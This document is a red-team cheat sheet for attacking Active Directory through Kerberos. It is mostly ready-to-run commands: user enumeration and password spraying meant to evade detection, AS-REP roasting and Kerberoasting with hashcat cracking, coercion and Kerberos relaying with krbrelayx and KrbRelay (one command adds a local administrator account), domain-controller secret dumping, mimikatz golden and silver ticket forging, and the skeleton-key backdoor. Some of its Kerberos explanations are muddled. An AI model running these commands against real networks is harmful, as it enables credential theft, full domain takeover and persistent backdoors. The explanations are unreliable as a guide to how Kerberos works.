Active Directory II - Kerberos and Impacket

Kerberos Abuse

Kerberos Abuse - Impacket Resources

• https://www.hackingarticles.in/abusing-kerberos-using-impacket/
• https://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html
• https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
• https://cheatsheet.haax.fr/windows-systems/exploitation/kerberos/

Kerberos Delegation - General Resources

• https://pentestlab.blog/2022/03/21/unconstrained-delegation/
• https://www.alteredsecurity.com/post/resource-based-constrained-delegation-rbcd

Privileged Accounts, Groups and ACLs

• https://adsecurity.org/?p=3658 - In depth article on groups, privileges and ACLs
• https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e
• https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges

Cached Creds and Tokens

• https://rastamouse.me/token-impersonation-in-csharp/
• https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/hh994565(v=ws.11)

LDAPSearch and DSQuery

• https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb - SpecterOps writeup
• https://room362.com/posts/2022/ldapsearch-reference/ - Good cheatsheet for LDAPSearch

Cas Van Cooten’s AD super-sheet

https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/

Kerberos - Common Terminology

• Ticket Granting Ticket (TGT) - A ticket-granting ticket is an authentication ticket used to request service tickets from the TGS for specific resources from the domain.

• Key Distribution Center (KDC) - The Key Distribution Center is a service for issuing TGTs and service tickets that consist of the Authentication Service and the Ticket Granting Service.

• Authentication Service (AS) - The Authentication Service issues TGTs to be used by the TGS in the domain to request access to other machines and service tickets.

• Ticket Granting Service (TGS) - The Ticket Granting Service takes the TGT and returns a ticket to a machine on the domain.

• Service Principal Name (SPN) - A Service Principal Name is an identifier given to a service instance to associate a service instance with a domain service account. Windows requires that services have a domain service account which is why a service needs an SPN set.

• KDC Long Term Secret Key (KDC LT Key) - The KDC key is based on the KRBTGT service account. It is used to encrypt the TGT and sign the PAC.

• Client Long Term Secret Key (Client LT Key) - The client key is based on the computer or service account. It is used to check the encrypted timestamp and encrypt the session key.

• Service Long Term Secret Key (Service LT Key) - The service key is based on the service account. It is used to encrypt the service portion of the service ticket and sign the PAC.

• Session Key - Issued by the KDC when a TGT is issued. The user will provide the session key to the KDC along with the TGT when requesting a service ticket.

• Privilege Attribute Certificate (PAC) - The PAC holds all of the user’s relevant information, it is sent along with the TGT to the KDC to be signed by the Target LT Key and the KDC LT Key in order to validate the user.

AS-REQ w/ Pre-Authentication In Detail

The AS-REQ step in Kerberos authentication starts when a user requests a TGT from the KDC. In order to validate the user and create a TGT for the user, the KDC must follow these exact steps.

• The first step is for the user to encrypt a timestamp NT hash and send it to the AS. The KDC attempts to decrypt the timestamp using the NT hash from the user, if successful the KDC will issue a TGT as well as a session key for the user.

• We need to start with where the tickets come from; the TGT is provided by the user to the KDC, in return, the KDC validates the TGT and returns a service ticket.

Service Ticket Contents

To understand how Kerberos authentication works you first need to understand what these tickets contain and how they’re validated. A service ticket contains two portions: the service provided portion and the user-provided portion. I’ll break it down into what each portion contains.

• Service Portion: User Details, Session Key, Encrypts the ticket with the service account NTLM hash.

• User Portion: Validity Timestamp, Session Key, Encrypts with the TGT session key.

Kerberos Authentication Overview

AS-REQ - 1.) The client requests an Authentication Ticket or Ticket Granting Ticket (TGT).

AS-REP - 2.) The Key Distribution Center verifies the client and sends back an encrypted TGT.

TGS-REQ - 3.) The client sends the encrypted TGT to the Ticket Granting Server (TGS) with the Service Principal Name (SPN) of the service the client wants to access.

TGS-REP - 4.) The Key Distribution Center (KDC) verifies the TGT of the user and that the user has access to the service, then sends a valid session key for the service to the client.

AP-REQ - 5.) The client requests the service and sends the valid session key to prove the user has access.

AP-REP - 6.) The service grants access

Kerberos Tickets Overview

The main ticket that you will see is a ticket-granting ticket these can come in various forms such as a .kirbi for Rubeus .ccache for Impacket. The main ticket that you will see is a .kirbi ticket. A ticket is typically base64 encoded and can be used for various attacks. The ticket-granting ticket is only used with the KDC in order to get service tickets. Once you give the TGT the server then gets the User details, session key, and then encrypts the ticket with the service account NTLM hash. Your TGT then gives the encrypted timestamp, session key, and the encrypted TGT. The KDC will then authenticate the TGT and give back a service ticket for the requested service. A normal TGT will only work with that given service account that is connected to it however a KRBTGT allows you to get any service ticket that you want allowing you to access anything on the domain that you want.

Attack Privilege Requirements

Kerbrute Enumeration - No domain access required 
Pass the Ticket - Access as a user to the domain required
Kerberoasting - Access as any user required
AS-REP Roasting - Access as any user required
Golden Ticket - Full domain compromise (domain admin) required 
Silver Ticket - Service hash required 
Skeleton Key - Full domain compromise (domain admin) required

Linux Vars

export USER=
export PASS=
export DOM=
export SUFF=.local
export FQDN=
export DCIP=
export IP=
export TARGET=
export USERS=users.txt
export PASSWDS=passwords.txt

Windows Vars

$user = ""
$pass = ""
$dom = ""
$suff = ""
$fqdn = ""
$dcip = ""
$ip = ""
$targetIP = ""
$users = ".\users.txt"
$passwords = ".\passwords.txt"

Kerbrute - Linux - Pre-Auth Enumeration

dc=$ip

fqdn=$domain 

wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64

chmod +x ./kerbrute_linux_amd64

./kerbrute_linux_amd64 userenum -d $fqdn --dc $dc $users

Kerbrute - Windows - Pre-Auth Enumeration

iwr https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_amd64.exe -o kerbrute.exe

.\kerbrute.exe -d $fqdn --dc $dcip $users

Pretender to Capture Hashes - Linux - Dry, No IPv6for safety, or No LLMNR

./pretender -i $if --dry

./pretender -i $if --no-dhcp --no-dns

./pretender -i $if --no-lnr

Pretender to Capture Hashes - Windows - Dry, No IPv6for safety, or No LLMNR

.\pretender.exe -i $if --dry

.\pretender.exe -i $if --no-dhcp --no-dns

.\pretender.exe -i $if --no-lnr

Coercer - Coerce Machine Account Hashes, needs Pretender / Responder / SMBServer

coercer scan -t $TARGETIP -u $USER -p $PASS -d $DOMAIN -v

# -l for IP of pretender/responder listener
coercer coerce -l $IP -t $TARGETIP -u $USER -p $PASS -d $DOMAIN -v

rpcump - Coerce - Find Spooler Services

rpcdump.py $DOMAIN/$USER:$PASS@$TARGETIP | grep MS-RPRN

printerbug - Coerce - Exploit spooler service

python3 dementor.py -d $DOMAIN -u $USER -p password $IP $TARGETIP

python3 printerbug.py "$DOMAIN"/"$USER":"PASS"@$TARGETIP $IP

Windows Binaries - Coerce - Force authentication

Interesting RPC classes project we can use, use rpcserver.py and these for MS-EFS(EFS POTATOE), MS-RPRN (PRINTERBUGs), MS-DCOM (POTATOES): https://github.com/cube0x0/SharpSystemTriggers Similar for SQL: https://github.com/p0dalirius/MSSQL-Analysis-Coerce

# Defender
C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\$ip\file.txt

# CertUtil
certutil.exe -syncwithWU  \\127.0.0.1\share
certutil.exe -syncwithWU  \\$ip\share

# MSSQL Client
EXEC xp_dirtree '\\$ip\pwn', 1, 1

Domain Password Policy - Linux w/ first credential

polenum $USER:$PASS@$DCIP

ldapsearch -H ldap://$DCIP -x -b "DC=$DOM,DC=$SUFF" -D $USER -W | grep -m 1 -B 10 pwdHistoryLength 

rpcclient -U "$USER" -N $DCIP;
    querydominfo

enum4linux -u "$USER" -p "$PASS" -P 

Domain Password Policy - windows

net accounts

Kerbrute - Linux Password Spray Known Good

# Spray many users with single password to avoid lockout and detection
./kerbrute_linux_amd64 passwordspray -d $fqdn --dc $dc ./users.txt $password

# Bruting with Pre-Auth  user/pass combolist
cat combos.txt | ./kerbrute_linux_amd64 -d $fqdn bruteforce -

Kerbrute - Windows Password Spray Known Good

# Windows Spray many users with single password to avoid lockout and detection
.\kerbrute.exe passwordspray -d $fqdn --dc $dc .\users.txt $password

# Bruting with Pre-Auth  user/pass combolist
cat combos.txt | .\kerbrute.exe -d $fqdn bruteforce -

rpcclient - Linux - Pasword Spray Good

# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do 
    rpcclient -U "$u%Welcome1" -c "getusername;quit" $DCIP | grep Authority;
done

srpay.sh - Linux - Pasword Spray Good with 10 attempts each users, pause 5 minutes, tries to account for passpol automatically

spray.py smb $targetIP $users $passwords 10 5 

DomainPasswordSpray - Windows - Fork using Kerberos Pre-auth

iwr https://github.com/mdavis332/DomainPasswordSpray/archive/refs/heads/master.zip -o DomainPasswordSpray.zip
Expand-Archive DomainPasswordSpray.zip
cd .\DomainPasswordSpray
Import-Module DomainPasswordSpray

$fqdn = "corpomax.local"

# Using Kerb over UDP/88
Invoke-DomainPasswordSpray -Verbose -ShowProgress -UserName (Get-Content '.\users.txt') -DomainName '$fqdn' -Password (Get-Content '.\passlist.txt') | Add-Content 'sprayed-creds.txt'

# Using NTLMw
Invoke-DomainPasswordSpray -ntlm -Verbose -ShowProgress -UserName (Get-Content '.\users.txt') -DomainName '$fqdn' -Password (Get-Content '.\passlist.txt') | Add-Content 'sprayed-creds.txt'

# Using Get-ADUser, if tool cant acquire users
Invoke-DomainPasswordSpray -Verbose -ShowProgress -UserName (Get-ADUser -SearchBase "OU=Special,OU=Accounts,DC=corpomax,DC=local" -Filter * | Select -Expand SamAccountName) -Password $pass

dsquery.exe/dsget.exe - Windows - Check pre-auth status for ASREPROASTable

for /f %i in (users.txt) do dsquery user -samid %i | dsget user -preauth

ldapsearch - linux - Check for ASREPROASTable users

while read user; do
    ldapsearch -x -H ldap://$DCIP -D "$FQDN" -w $PASS -b "dc=$DOM,dc=$SUFF" "(sAMAccountName=$user)" userAccountControl | grep userAccountControl
done < users.txt

Get-NPUSers.py - Check our list of users for Kereberos Pre-Auth disabled

python3 Get-NPUsers.py $FQDN/$USER -dc-ip $DCIP -no-pass -format hashcat

Get-NPUSers.py - ASREPRoast users

# If the -usersfile argument is not supplied, and no credentials are set (hashes, password, ticket), the script will try to retrieve the users list through the RPC enumdomusers command through an RPC null session.

# users list dynamically queried with an RPC null session
python3 GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip $DCIP "$DOMAIN"

# with a users file
python3 GetNPUsers.py -usersfile $USERS -request -format hashcat -outputfile ASREProastables.txt -dc-ip $DCIP 'DOMAIN/'

# users list dynamically queried with a LDAP authenticated bind (password)
python3 GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip $DCIP "$FQDN"/"$USER":"$PASS"

# users list dynamically queried with a LDAP authenticated bind (NT hash)
export LMhash=
export NTHash= 
python3 GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -hashes "$LMhash:$NThash" -dc-ip $DCIP "$FQDN"/"$USER":"$PASS"

# Crack Hashes
hashcat -m 18200 hash.txt $PASSWORDS

Get-UserSPNs - Kerberoast

# Kerberoasting syntax
python3 GetUserSPNs.py $DOM.$SUFF/$USER:$PASS -dc-ip $DCIP -request -format hashcat

# release the crackin
hashcat -m 13100 -a 0 hash.txt Pass.txt

Rubeus and Mimikatz - Dog Party

Rubeus - Windows - Password Spraying / Bruteforcing normal and w/ Lists

# with a list of users
.\Rubeus.exe brute /users:$users /passwords:$passwords /domain:$dom /outfile:gotem.txt

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:$passwords /outfile:stillgotem.txt

# Spray many users with single password to avoid lockout and detection
.\Rubeus.exe brute /password:$password /noticket

Rubeus - Harvesting TGTs

# Perpetual Harvest
Rubeus.exe harvest /interval:30

Rubeus - Password Spray

Rubeus - Kerberoast

# Copy HASH into txt file for cracking with hashcat
Rubeus.exe kerberoast

hashcat -m 13100 -a 0 hash.txt Pass.txt

Rubeus - ASREPRoast

# Does it all for you
rubeus.exe asreproast

# crack rock steady
hashcat -m 18200 hash.txt Pass.txt

Mimikatz

# Enter console
mimikatz.exe

# Check if you get a '20' back, or else you don't have rights
privilege::debug

Mimikatz - Export and Pass the Ticket (Detection Opportunity in kirbi files)

# Exports all the tickets to current directory as kirbi files

sekurlsa::tickets /export


kerberos::ptt [0;2fw3ras3r] - 2 -= 545.. etc

# Verify we're impersonating as the admin ticket we just passed
klist

Kerberos Sessions - Check Kerberos Information

qwinsta
klist sessions

Kerberos - Relaying

• https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
• https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/
• https://dirkjanm.io/relaying-kerberos-over-dns-with-krbrelayx-and-mitm6/
• https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a

KrbRelayX - All the flags

# Kerberos Relaying
krbrelayx.py -t smb://$TARGETIP -ip $IP

# Unconstrained Delegation Abuse
krbrelayx.py -t smb://$TARGETIP -ip $IP -p $PASS -s $USER.$DOM.$SUFF -dc-ip $DCIP

# Watching Target File for Changes
krbrelayx.py -tf ips.txt -w -ip $IP

# Basic Kerberos Relaying
krbrelayx.py -t smb://$TARGETIP -ip $IP

# Using a Targets File
krbrelayx.py -tf $targets -ip $IP

# Watching Target File for Changes
krbrelayx.py -tf $targets -w -ip $IP

# Redirecting HTTP Requests
krbrelayx.py -r $targetIP -ip $IP

# Specifying Loot Directory
krbrelayx.py -l loot -ip $IP

# Storing Tickets in Mimikatz Format
krbrelayx.py -f kirbi -ip $IP

# Disabling SMB2 Support
krbrelayx.py -no-smb2support -ip $IP

# Serving WPAD File for Proxy Authentication Attack
krbrelayx.py -wh $USER.$DOM.$SUFF -ip $IP

# Prompting for Authentication N Times for Clients without MS16-077
krbrelayx.py -wa 3 -ip $IP

# Listening on Both IPv6 and IPv4
krbrelayx.py -6 -ip $IP

# Unconstrained Delegation Abuse with Password
krbrelayx.py -p $PASS -s $USER.$DOM.$SUFF -dc-ip $DCIP -ip $IP

# Unconstrained Delegation Abuse with NTLM Hashes
krbrelayx.py -hashes LMHASH:NTHASH -s $USER.$DOM.$SUFF -dc-ip $DCIP -ip $IP

# SMB Attack with File Execution
krbrelayx.py -e somefile.exe -ip $IP

# SMB Attack with Command Execution
krbrelayx.py -c "some command" -ip $IP

# Enumerate Local Admins
krbrelayx.py --enum-local-admins -ip $IP

# LDAP Attack without Dumping LDAP Info
krbrelayx.py --no-dump -ip $IP

# LDAP Attack without Adding a Domain Admin
krbrelayx.py --no-da -ip $IP

# LDAP Attack without ACL Attacks
krbrelayx.py --no-acl -ip $IP

# LDAP Attack without Validating Privileges
krbrelayx.py --no-validate-privs -ip $IP

# LDAP Attack with User Escalation
krbrelayx.py --escalate-user someuser -ip $IP

# LDAP Attack to Add a New Computer Account
krbrelayx.py --add-computer -ip $IP

# LDAP Attack to Delegate Access
krbrelayx.py --delegate-access -ip $IP

# AD CS Relay Attack
krbrelayx.py --adcs -ip $IP

# AD CS Relay Attack with Template
krbrelayx.py --adcs --template DomainController -ip $IP

# AD CS Relay Attack with Victim Specification
krbrelayx.py --adcs -v somevictim -ip $IP

KrbRelayX - UCD - Find user trusted for unconstrained delegation, add SPN/DNS for a fake machine we can control, impersonate and coerce DC, then dump credentials from DC

https://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html

For an account to be configured with delegation, they also need to be configured with an SPN (Service Principal Name). This means that we should be able to retrieve a crackable Kerberos ticket for the accounts we find with ldapdomaindump using GetUserSPNs.py. After creating an SPN for the ‘host’ service with our user configured with unconstrained delegation on this non-existent hostname that now points to our system, we are basically creating a new ‘computer’ on the network that has unconstrained delegation configured on the ‘host’ service on it. This is very important the krbsalt is the FQDN of the domain in ALL CAPS, followed immediately by the username (case-sensitive). The Krbpass is the user’s password.

export DCIP=172.16.15.1
export DOMAIN=corpomax.local
export DOM=corpomax
export SUFF=local
export INTERFACE=172.16.15.11
export IP=$INTERFACE
export TARGETIP=172.16.15.24
export DCNAME=dc2022
export PASS=


# Find a user 'deLEGate' trusted for delegation or a machine we already control
python3 ldapdomaindump.py $DCIP -u "$DOM\$USER"
grep TRUSTED_FOR_DELEGATION domain_users.grep >> delegation.txt
grep TRUSTED_FOR_DELEGATION domain_computers.grep >> delegation.txt
grep TRUSTED_TO_AUTH_FOR_DELEGATION domain_users.grep >> contrained.txt
grep TRUSTED_TO_AUTH_FOR_DELEGATION domain_computers.grep >> constrained.txt
export USER=deLEGate

# See if we can get a crackable Kerb ticket for the unconstrained user to acquire password 
GetUserSPNs -dc-ip $DCIP $DOMAIN/$USER:$PASS -request-user $USER -outputfile $USER.SPN.txt

# Add SPN for a fake machine, so we can add a DNS record for the fake machine and point kerberos authentication towards our relay
python3 addspn.py -u $DOM\\$USER -s host/fake.$DOM.$SUFF ldap://$DCNAME.$DOM.$SUFF
dnstool.py -u $DOM\\$USER -r fake.$DOM.$SUFF -a add -d $IP $DCNAME.$DOM.$SUFF

# Terminal 1 - krbrelayx - Case-sensitive krbsalt if "deLEGate" is user trusted for delegation in TEST.LOCAL, krbrelayx.py --krbsalt DOMAIN.FQDNUsernameCaseSensitive --krbpass PASSWORD
krbrelayx.py --krbsalt $DOM.$SUFFdeLEGate --krbpass $PASS

# Terminal 2 - printerbug - Actual user doesn't matter as long as theyre a domain account, printerbug.py DOMAIN/USERNAME:PASSWORD@DC_HOSTNAME FAKE_SYSTEM.FQDN
printerbug.py $DOM/$USER:$PASS@$DCNAME.$DOM.$SUFF fake.$DOM.$SUFF

# Terminal 1 - Should receive the TGT from DC2022$, which we can export 
export KRB5CCNAME=$DCNAME\$\@$DOM.$SUFF.CCACHE

# Terminal 1 - Secretsdump - Dump Secrets using kerberos ticket in the ccache
secretsdump.py -k $DCNAME -just-dc

Powershell - Privileged Groups and ACLs for Delegation Targets

Get-ADGroupMember -Identity 'Account Operators' | Format-Table Name, SamAccountName, ObjectClass
Get-ADGroupMember -Identity 'Server Operators' | Format-Table Name, SamAccountName, ObjectClass
Get-ADGroupMember -Identity 'Backup Operators' | Format-Table Name, SamAccountName, ObjectClass
Get-ACL "AD:CN=AdminSDHolder,CN=System,DC=$dom,DC=$suff" | Format-List

KrbRelay

Repo has error codes, resources for finding more CLSIDs, links, explanations, etc - https://github.com/cube0x0/KrbRelay

# Check OxID resolver port
.\KrbRelay\CheckPort\bin\Release\CheckPort.exe

# LPE
.\KrbRelay.exe -spn ldap/dc01.$dom.$suff -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -rbcd S-1-5-21-2982218752-1219710089-3973213059-1606
.\KrbRelay.exe -spn ldap/dc01.$dom.$suff -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -shadowcred

# Cross-Session LDAP
.\KrbRelay.exe -spn ldap/dc01.$dom.$suff -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -shadowcred
.\KrbRelay.exe -spn ldap/dc01.$dom.$suff -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -shadowcred win2016$
.\KrbRelay.exe -spn ldap/dc01.$dom.$suff -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -rbcd S-1-5-21-2982218752-1219710089-3973213059-1606 win2016$
.\KrbRelay.exe -spn ldap/dc01.$dom.$suff -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -add-groupmember srv_admins $user
.\KrbRelay.exe -spn ldap/dc01.$dom.$suff -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -laps
.\KrbRelay.exe -spn ldap/dc02.$dom.$suff -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -ssl -gmsa
.\KrbRelay.exe -spn ldap/dc02.$dom.$suff -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -ssl -reset-password administrator Password123!

# Cross-Session HTTP
.\KrbRelay.exe -spn http/exchange.$dom.$suff -endpoint EWS/Exchange.asmx -ssl -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -ews-search beta,test
.\KrbRelay.exe -spn http/exchange.$dom.$suff -endpoint EWS/Exchange.asmx -ssl -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -ews-delegate $user@$dom.$suff
.\KrbRelay.exe -spn http/win2016.$dom.$suff -endpoint iisstart.htm -proxy -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182

# Cross-Session SMB
.\KrbRelay.exe -spn cifs/win2016.$dom.$suff -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -console
.\KrbRelay.exe -spn cifs/win2016.$dom.$suff -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -add-privileges (([System.Security.Principal.WindowsIdentity]::GetCurrent()).User.Value)
.\KrbRelay.exe -spn cifs/win2016.$dom.$suff -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -secrets 
.\KrbRelay.exe -spn cifs/win2016.$dom.$suff -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -service-add addUser "C:\windows\system32\cmd.exe /c """"C:\windows\system32\net user cube Password123! /add && C:\windows\system32\net localgroup administrators cube /add"""""

# LLMNR
.\KrbRelay.exe -llmnr -spn 'cifs/win2019.$dom.$suff' -secrets

# NTLM (see https://github.com/antonioCoco/RemotePotato0 for CLSIDs)
.\KrbRelay.exe -session 1 -clsid 0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4 -ntlm
.\KrbRelay.exe -session 1 -clsid 0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4 -ntlm -downgrade

Kerberos - Silver and Gold Tickets

Cheatsheet: https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a

Silver Tickets

A silver ticket can sometimes be better used in engagements rather than a golden ticket because it is a little more discreet. If stealth and staying undetected matter then a silver ticket is probably a better option than a golden ticket however the approach to creating one is the exact same. The key difference between the two tickets is that a silver ticket is limited to the service that is targeted whereas a golden ticket has access to any Kerberos service.

A specific use scenario for a silver ticket would be that you want to access the domain’s SQL server however your current compromised user does not have access to that server. You can find an accessible service account to get a foothold with by kerberoasting that service, you can then dump the service hash and then impersonate their TGT in order to request a service ticket for the SQL service from the KDC allowing you access to the domain’s SQL server.

KrbTGT

In order to fully understand how these attacks work you need to understand what the difference between a KRBTGT and a TGT is. A KRBTGT is the service account for the KDC this is the Key Distribution Center that issues all of the tickets to the clients. If you impersonate this account and create a golden ticket form the KRBTGT you give yourself the ability to create a service ticket for anything you want. A TGT is a ticket to a service account issued by the KDC and can only access that service the TGT is from like the SQLService ticket.

Golden/Silver Ticket

A golden ticket attack works by dumping the ticket-granting ticket of any user on the domain this would preferably be a domain admin however for a golden ticket you would dump the krbtgt ticket and for a silver ticket, you would dump any service or domain admin ticket. This will provide you with the service/domain admin account’s SID or security identifier that is a unique identifier for each user account, as well as the NTLM hash. You then use these details inside of a mimikatz golden ticket attack in order to create a TGT that impersonates the given service account information.

mimikatz - Dump the KrbTGT

for GoldenTicket, full rights to whole domain as the KRBTGT

# Dump hash and secuiryt identifier we need, targets krbtgt account
lsadump::lsa /inject /name:krbtgt

# Craft GoldenTicket with krkbtgt hash
Kerberos::golden /user:Administrator /domain:controller.local /sid: /krbtgt: /id:500 

for SilverTicket, has rights of whatever you impersonated i.e. SQLService

lsadump::lsa /inject /name:SQLService

Kerberos::silver /user:SQLService /domain:controller.local /sid:$SIDE /krbtgt:$HASH /id:212

open cmd prompt with new Golden/Silver Ticket

misc::cmd

Backdoors

Skeleton Key Overview

The skeleton key works by abusing the AS-REQ encrypted timestamps as I said above, the timestamp is encrypted with the users NT hash. The domain controller then tries to decrypt this timestamp with the users NT hash, once a skeleton key is implanted the domain controller tries to decrypt the timestamp using both the user NT hash and the skeleton key NT hash allowing you access to the domain forest.

Install the Skeleton Key

misc::skeleton

Accessing the forest

The default credentials will be: “mimikatz”

net use c:\\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz # The share will now be accessible without the need for the Administrators password

dir \\Desktop-1\c$ /user:Machine1 mimikatz # access the directory of Desktop-1 without ever knowing what users have access to Desktop-1

The skeleton key will not persist by itself because it runs in the memory, it can be scripted or persisted using other tools and techniques.